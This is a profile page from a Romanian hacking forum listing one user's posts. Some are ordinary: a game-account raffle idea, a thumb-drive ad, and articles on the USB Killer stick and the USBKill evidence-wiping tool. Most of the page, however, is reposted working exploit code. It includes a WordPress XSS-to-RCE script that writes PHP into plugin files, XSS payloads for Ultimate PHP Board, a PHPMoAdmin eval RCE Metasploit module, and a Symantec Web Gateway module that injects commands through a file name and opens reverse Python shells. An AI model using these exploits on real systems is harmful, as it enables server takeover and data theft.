Jump to content

kp112

Active Members
  • Posts

    114
  • Joined

  • Last visited

Posts posted by kp112

  1. @theandruala

    au fost investiti niste bani in ele de aceea vrea sau recuperez minim invetitia facuta !

     

    @yoyois

    cum sa fie scam din moment ce extragerea va fii LIVE si baza de date cu toti inregistrati in tombola/ticket va fii publica ?

    sansele de a recupera conturile sunt minim din 2 motive :

    1. Se schimba numerele de telefoane de pe conturi

    2. Se pot schimba adresele de mail !

     

     

    Daca aveti voi o alta idee de a elimia posibilitatea de SCAM astept o idee prin care sa le dau si sa imi recuperez minim investitia facuta in conturi !

     

     

  2. Salutare
    In primu rand SARBATORI FERICITE alaturi de cei dragi RST <:-P

     Detin cateva Conturi PERSONALE la anumite jocuri si m-am gandit sa le vand ca le tin degeaba de apoape 2 ani poate se bucura cineva de ele !
     
     Ideea este in felu urmator ce as dori sa fac :
     Un site unde sa iti faci cont ca sa poti cumpara tichete
     (exemplu)1 Ticket costa 15 Lei prin care sa ii genereze un cod gen F28C2RKJ7 sau numere de la 1 - 1000000 (pot fii cumparate in numar nelimitat/limitat pentru mai multe sanse)
     Toate codurile sa se stranga intr`o baza de date iar dupa o anumita perioada sa extrag LIVE cu random.org numerele castigatoare sau cu altceva
     
     
     Are cineva o ideea despre un plugin pentru site ?

    • Downvote 1
  3. care sti rusa :))

    @tqcsu - USBKill — Code That Kills Computers Before They Examine USBs for Secrets este diferit fata de This 'Killer USB' can make your Computer explode [citeste cu atentie continutu ]

    iar This 'Killer USB' can make your Computer explode l-am pus in ro si in eng pt straini!

    visezi spam!

    logic ar trebui sa mearga

    practic mai vedem :))

    am inceput sa caut mai adac sa vad ce pot gasi :)

    7c7a62154e7cc7559948b2431d3f7540.jpg

    019b232a9fd3f55c74d1cff91e67686e.jpg

  4. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator.

    /*
    Author: @evex_1337
    Title: Wordpress XSS to RCE
    Description: This Exploit Uses XSS Vulnerabilities in Wordpress
    Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
    Administrator Previliged User. ¯\_(?)_/¯
    Reference: [url]http://research.evex.pw/?vuln=14[/url]
    Enjoy.

    */
    //Installed Plugins Page
    plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
    'plugins.php' : 'wp-admin/plugins.php';
    //Inject "XSS" Div
    jQuery('body').append('<div id="xss" ></div>');
    xss_div = jQuery('#xss');
    xss_div.hide();
    //Get Installed Plugins Page Source and Append it to "XSS" Div
    jQuery.ajax({
    url: plugins,
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    }
    });
    //Put All Plugins Edit URL in Array
    plugins_edit = [
    ];
    xss_div.find('a').each(function () {
    if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
    plugins_edit.push(jQuery(this).attr('href'));
    }
    });
    //Inject Payload
    for (var i = 0; i < plugins_edit.length; i++) {
    jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    _wpnonce =
    jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"
    value="(.*?)"') [1];
    old_code = jQuery('form#template div textarea#newcontent') [0].value;
    payload = '<?php phpinfo(); ?>';
    new_code = payload + '\n' + old_code;
    file = plugins_edit[i].split('file=') [1];
    jQuery.ajax({
    url: plugins_edit[i],
    type: 'POST',
    data: {
    '_wpnonce': _wpnonce,
    'newcontent': new_code,
    'action': 'update',
    'file': file,
    'submit': 'Update File'
    },
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    if (jQuery('form#template div textarea#newcontent')
    [0].value.indexOf(payload) != - 1) {
    // Passed, this is up to you ( skiddies Filter )
    injected_file = window.location.href.split('wp-admin') [0] +
    '/wp-content/plugins/' + file; //
    [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url]
    throw new Error('');
    }
    }
    });
    }
    });
    }

    Source : WordPress 4.2.1 XSS / Code Execution

  5. Stick-urile USB au devenit medii de stocare universale în ultimii zece ani. Acestea sunt folosite la nivel global de c?tre oricine are de mutat fi?iere de pe un computer pe altul sau pentru stocarea unor date importante, departe de hackeri ?i de eventualele probleme care ar putea ap?rea pe PC-ul surs?. Ei bine, un pasionat de hardware din Rusia a dezvoltat USB Killer, un stick USB care poate s? distrug? orice computer în care este introdus. Partea îngrijor?toare este c? acesta arat? ca orice stick obi?nuit.

    usb-killer-2.jpg

    De?i nu avem nicio dovad? c? acest dispozitiv func?ioneaz? cu adev?rat ?i nici nu exist? o versiune comercial? a sa, descrierea modului în care func?ioneaz? este destul de conving?toare. Creatorul s?u nu s-a hot?rât înc? dac? dore?te s? ofere la liber specifica?iile tehnice ale acestui stick sau s? încerce s? scoat? ni?te bani de pe urma lui prin crowdfunding, îns? ia aceste dou? posibilit??i în considerare.

    Stick-ul „bucluca?” func?ioneaz? ca un invertor. Acesta se alimenteaz? cu energie electric? de la portul USB ?i încarc? codensatorii pân? la -110 V. Când acest voltaj este atins, invertorul este oprit, iar transistorul se deschide. Acesta împinge sarcina negativ? c?tre portul USB. Procesul este repetat pân? când toate componentele din computer care mai pot s? alimenteze USB-ul cu energie electric? sunt arse de c?tre dispozitiv.

    usb-killer.jpg

    Momentan nu exist? prea multe motive de îngrijorare. Cei mai mul?i utilizatori de PC-uri ?tiu deja c? nu este indicat s? folose?ti stick-uri USB din surse dubioase. Dispozitivul exist? doar în mâinile creatorului s?u, care a declarat c? nu vede prea multe aplica?ii practice pentru acesta. USB Killer-ul a fost comparat chiar ?i cu cu o bomb? nuclear?: e bine s? ai în posesie un asemenea stick, îns? nu este indicat s? îl ?i folose?ti.

    Source : USB Killer: un stick care poate s? distrug? orice PC

  6. jkipfc.jpg

    USBkill — A new program that once activated, will instantly disable the laptop or computer if there is any activity on USB port.

    Hey Wait, don’t compare USBkill with the USB Killer stick that destroy sensitive components of a computer when plugged-in.

    "USBKill" is a new weapon that could be a boon for whistleblowers, journalists, activists, and even cyber criminals who want to keep their information away from police and cyber thieves.

    It is like, if you are caught, kill yourself. In the same fashion as terrorists do.

    Here I am not talking about to kill yourself, but to kill the data from your laptop if the law enforcement has caught your laptop.

    USBkill does exactly this by turning a thumb drive into a kill switch that if unplugged, forces systems to shut down.

    Hephaestos (@h3phaestos), the author of USBkill, reports that the tool will help prevent users from becoming the next Ross Ulbricht, founder of the infamous underground drug marketplace Silk Road, who was arrested in a 2013 FBI raid in which his laptop was seized by law enforcement agencies.

    "USBKill waits for a change on your USB ports, then immediately kills your computer," a Github document states.

    Completely Wipe up any pieces of evidence before Feds caught you:

    Generally, the kind of activities on USB port include the police installing a mouse jiggler – a tool that prevents computer systems from going to sleep, and any USB drive being removed from the computer.

    "If this happens you would like your computer to shut down immediately," Hephaestos says. Simply, tie a flash USB key to your ankle, and instantly start USBkill when the police or any other law enforcement official caught you with a laptop.

    In case, they steal or take your laptop or computer with them, they would definitely remove the USB drive that will immediately shut down your laptop.

    The author of USBkill states that the program could be very effective when running on a virtual machine, which would vanish when you reboot.

    The author says that USBKill will be added to additional commands and functions. However, it does work correctly and efficiently in its current state as well.

    Source: USBKill — Code That Kills Computers Before They Examine USBs for Secrets

  7. 25kln9f.jpg

    Can Hackers turn a remote computer into a bomb and explode it to kill someone, just like they do in hacker movies? Wait, wait! Before answering that, Let me tell you an interesting story about Killer USB drive:

    A man walking in the subway stole a USB flash drive from the outer pocket of someone else's bag. The pendrive had "128" written on it. After coming home, he inserted the pendrive into his laptop and instead discovering any useful data, he burnt half of his laptop down. The man then took out the USB pendrive, replaced the text "128" with "129" and put it in the outer pocket of his bag… Amen!

    I’m sure, you would really not imagine yourself being the 130th victim of this Killer perdrive, neither I.

    This above story was told to a Russian researcher, nicknamed Dark Purple, who found the concept very interesting and developed his own computer-frying USB Killer pendrive.

    He is working with electronic manufacturing company from where he ordered some circuit boards from China for creating his own USB killer stick.

    "When we connect it up to the USB port, an inverting DC/DC converter runs and charges capacitors to -110V," the researcher explained. "When the voltage is reached, the DC/DC is switched off. At the same time, the field transistor opens."

    vmyd87.jpg

    At last, he successfully developed a well functioning USB killer pendrive which is able to effectively destroy sensitive components of a computer when plugged-in.

    "It is used to apply the -110V to signal lines of the USB interface. When the voltage on capacitors increases to -7V, the transistor closes and the DC/DC starts. The loop runs till everything possible is broken down. Those familiar with the electronics have already guessed why we use negative voltage here."

    It is not possible for hardware to prevent all damage to physical systems in some scenarios. It may be possible for an attacker to exploit SCADA vulnerabilities and remove safety controls used by power plants or put it into an unstable state.

    34j83m9.jpg

    Stuxnet worm is one of the real example of such cyber attacks, which was designed to destroy centrifuges at the Nuclear facility and all this started from a USB drive.

    Also in 2014, a security firm demonstrated an attack on Apple’s Mac computer by overriding temperature controls, which can actually set the machine on fire.

    So if we say that a computer could be converted into a bomb, then of course it’s true, a hacker can probably make your computer explode as well.

    Therefore, next time when you find an unknown USB flash drive, just beware before inserting it into your laptop. Because this time it will not fire up your important files or data stored on your laptop like what malwares do, instead it will fire up your Laptop.

    Source : This 'Killer USB' can make your Computer explode

    Original Source Rusian : USB killer

  8. 1 x 2TB USB Thumb drive. (2TB = 2,000GB)

    Note: This drive can hold up to 1000 x HD Movies

    Note: Do not buy a big, power hungry external HDD

    Note: USB Thumb drive do not have moving parts like HDD...more reliable

    Note: Plug into your Smart-TV and play directly (Note some TV cannot read to high memory size)

    Note: Use as backup for your entire PC/Laptop HDD and more!

    Note: Save pounds/kgs from you backpack....live you HDD at home!

    Brand new. Not opened. (We may check before sending if required)

    High speed read speed USB-2: 18 Mb/S

    High speed write speed USB-2: 15 Mb/s

    Storage life of over 10 years.

    Equipement Compatibility: PC/Laptop/Tablets/SmartTV/Routers/Media Servers

    Operating systems: Windows 7, 8, 8.1

    To read and read in high speed

    Plug and Play

    Support USB zip and Disk Boot

  9. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting

    Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability.

    # Exploit Title   : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability
    # CVE : CVE-2015-2217
    # Date : 4 March 2015
    # Exploit Author : CWH Underground
    # Discovered By : ZeQ3uL
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.myupb.com
    # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip
    # Version : 2.2.7

    ,--^----------,--------,-----,-------^--,
    | ||||||||| `--------' | O .. CWH Underground ..
    `+---------------------------^----------|
    `\_,-------, _________________________|
    / XXXXXX /`| /
    / XXXXXX / `\ /
    / XXXXXX /\______(
    / XXXXXX /
    / XXXXXX /
    (________(
    `------'

    ####################
    SOFTWARE DESCRIPTION
    ####################

    Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL.

    ####################################
    DESCRIPTION FOR CROSS SITE SCRIPTING
    ####################################

    myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

    An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
    This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

    myUPB 2.2.7 is vulnerable; other versions may also be affected.

    ####################
    VULNERABILITY DETAIL
    ####################

    1. Reflect Cross Site Scripting (search.php)
    POC:
    /search.php?q='><script>alert(1)</script>

    2. Stored Cross Site Scripting (profile.php)
    POC:
    POST /upb/profile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/upb/profile.php
    Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------287611866431947
    Content-Length: 716
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_email"
    t@t.com
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_loca"
    th
    -----------------------------287611866431947
    Content-Disposition: form-data; name="avatar"
    images/avatars/chic.jpg'><script>alert("hacked");</script>
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_site"
    http://
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_timezone"
    0
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_edit"
    Submit
    -----------------------------287611866431947--

    ################################################################################################################
    Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
    ################################################################################################################

    Source

  10. PHPMoAdmin 1.1.2 Remote Code Execution

    This Metasploit module exploits an arbitrary PHP command execution vulnerability due to a dangerous use of eval() in PHPMoAdmin.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'


    class Metasploit4 < Msf::Exploit::Remote

    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'PHPMoAdmin 1.1.2 Remote Code Execution',
    'Description' => %q{
    This module exploits an arbitrary PHP command execution vulnerability due to a
    dangerous use of eval() in PHPMoAdmin.
    },
    'Author' =>
    [
    'Pichaya Morimoto pichaya[at]ieee.org', # Public PoC
    'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
    ],
    'License' => MSF_LICENSE,
    'References' =>
    [
    [ 'CVE', '2015-2208' ],
    [ 'EDB', '36251' ],
    [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
    [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
    ],
    'Privileged' => false,
    'Platform' => 'php',
    'Arch' => ARCH_PHP,
    'Targets' =>
    [
    [ 'PHPMoAdmin', { } ],
    ],
    'DisclosureDate' => 'Mar 03 2015',
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
    ], self.class)
    end

    def check
    testrun = Rex::Text::rand_text_alpha(10)
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri,'moadmin.php'),
    'method' => 'POST',
    'vars_post' =>
    {
    'object' => "1;echo '#{testrun}';exit",
    }
    })

    if res and res.body.include?(testrun)
    return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
    end

    def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
    'uri' => normalize_uri(target_uri,'moadmin.php'),
    'method' => 'POST',
    'vars_post' =>
    {
    'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
    }
    })

    end
    end

    Source

  11. This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
    super(update_info(info,
    'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
    'Description' => %q{
    This module exploits a command injection vulnerability found in Symantec Web
    Gateway's setting restoration feature. The filename portion can be used to inject
    system commands into a syscall function, and gain control under the context of
    HTTP service.

    For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
    However, for version 5.2.1, you must be an administrator.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Egidio Romano', # Original discovery & assist of MSF module
    'sinn3r'
    ],
    'References' =>
    [
    [ 'CVE', '2014-7285' ],
    [ 'OSVDB', '116009' ],
    [ 'BID', '71620' ],
    [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
    [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
    ],
    'Payload' =>
    {
    'Compat' =>
    {
    'PayloadType' => 'cmd',
    'RequiredCmd' => 'generic python'
    }
    },
    'DefaultOptions' => {
    'RPORT' => 443,
    'SSL' => true,
    'SSLVersion' => 'TLS1'
    },
    'Platform' => ['unix'],
    'Arch' => ARCH_CMD,
    'Targets' =>
    [
    ['Symantec Web Gateway 5', {}]
    ],
    'Privileged' => false,
    'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
    OptString.new('USERNAME', [true, 'The username to login as']),
    OptString.new('PASSWORD', [true, 'The password for the username'])
    ], self.class)
    end

    def protocol
    ssl ? 'https' : 'http'
    end

    def check
    uri = target_uri.path
    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})

    if res && res.body.include?('Symantec Web Gateway')
    return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
    end

    def get_sid
    sid = ''

    uri = target_uri.path
    res = send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/login.php'),
    'method' => 'GET',
    })

    unless res
    fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    sid
    end

    def login(sid)
    uri = target_uri.path
    res = send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/login.php'),
    'method' => 'POST',
    'cookie' => sid,
    'headers' => {
    'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
    },
    'vars_post' => {
    'USERNAME' => datastore['USERNAME'],
    'PASSWORD' => datastore['PASSWORD'],
    'loginBtn' => 'Login'
    }
    })

    unless res
    fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
    # Successful login
    return sid
    else
    # Failed login
    fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    end
    end

    def build_payload
    # At of today (Feb 27 2015), there are only three payloads this module will support:
    # * cmd/unix/generic
    # * cmd/unix/reverse_python
    # * cmd/unix/reverse_python_ssl
    p = payload.encoded

    case datastore['PAYLOAD']
    when /cmd\/unix\/generic/
    # Filter that one out, Mr. basename()
    p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
    p = "python -c \"exec('#{p}'.decode('base64'))\""
    else
    p = p.gsub(/python -c "exec/, 'python -c \\"exec')
    p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
    end

    p
    end

    def build_mime
    p = build_payload

    data = Rex::MIME::Message.new
    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
    data.add_part('', nil, nil, 'form-data; name="restore"')
    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
    data.add_part('0', nil, nil, 'form-data; name="max_events"')
    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
    data.add_part('', nil, nil, 'form-data; name="testaddress"')
    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
    data.add_part('', nil, nil, 'form-data; name="capture_filter"')

    data
    end

    def inject_exec(sid)
    uri = target_uri.path
    mime = build_mime # Payload inside
    send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/restore.php'),
    'method' => 'POST',
    'cookie' => sid,
    'data' => mime.to_s,
    'ctype' => "multipart/form-data; boundary=#{mime.bound}",
    'headers' => {
    'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
    }
    })
    end

    def save_cred(username, password)
    service_data = {
    address: rhost,
    port: rport,
    service_name: protocol,
    protocol: 'tcp',
    workspace_id: myworkspace_id
    }

    credential_data = {
    module_fullname: self.fullname,
    origin_type: :service,
    username: username,
    private_data: password,
    private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
    core: credential_core,
    last_attempted_at: DateTime.now,
    status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
    end

    def exploit
    print_status("Getting the PHPSESSID...")
    sid = get_sid
    if sid.blank?
    print_error("Failed to get the session ID. Cannot continue with the login.")
    return
    end

    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    sid = login(sid)
    if sid.blank?
    print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
    return
    else
    # Good password, keep it
    save_cred(datastore['USERNAME'], datastore['PASSWORD'])
    end

    print_status("Trying restore.php...")
    inject_exec(sid)
    end

    end

    Source

×
×
  • Create New...